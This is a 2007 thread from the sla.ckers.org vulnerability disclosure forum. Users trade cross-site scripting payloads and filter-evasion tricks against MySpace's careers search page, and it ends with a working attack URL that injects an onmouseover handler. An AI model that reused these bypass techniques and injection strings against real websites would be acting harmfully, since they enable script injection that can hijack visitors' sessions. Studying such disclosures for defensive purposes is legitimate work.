Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
New Myspace XSS with a little help
Posted by: malorn
Date: January 14, 2007 05:36PM

Interesting filtering done on this one. I can escape the quote but I have one little issue. Here's what I have managed to do thus far:

value="test">< script>alert('xss')</script>

The issue is that myspace seems to be filtering a-zA-Z after <, which redirects me to an error page. As you can see / doesn't trigger the error and neither does space, as it only seems to be a-zA-Z.

Any suggestions? I have tried <i , <b, etc to verify this

Options: ReplyQuote
Re: New Myspace XSS with a little help
Posted by: malorn
Date: January 14, 2007 08:41PM

I also tried doing test"><<!-- test -->script> but I got redirected to the error page as well because it seems they are filtering !

So close!

Options: ReplyQuote
Re: New Myspace XSS with a little help
Posted by: digi7al64
Date: January 14, 2007 09:29PM

Don't let the error page throw you off. it will happen from time to time.

also you can just use

<!--

which myspace will change into

<!-- -->

but it won't work. the html comment causes it to fail

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: New Myspace XSS with a little help
Posted by: malorn
Date: January 14, 2007 09:54PM

Alright i'll turn it over:

http://sads.myspace.com/index.cfm?fuseaction=careers.search&sb=&startIndex=0&keywords=test&location=test%22%3E%3C%20script%3Ealert('xss')%3C/script%3E&x=42&y=5

I can't seem to get it and I want to see an answer to this puzzle ;)

Options: ReplyQuote
Re: New Myspace XSS with a little help
Posted by: Lockdown
Date: January 14, 2007 11:11PM

Got one:

http://sads.myspace.com/index.cfm?fuseaction=careers.search&keywords=lawl+%27&location=%22+onmouseover%3D%22alert%28%27xss%27%29%3B&special=&sb=&startIndex=0

Myspace Exploit ^7 by Lockdown



Edited 1 time(s). Last edit at 01/14/2007 11:11PM by Lockdown.

Options: ReplyQuote


Sorry, only registered users may post in this forum.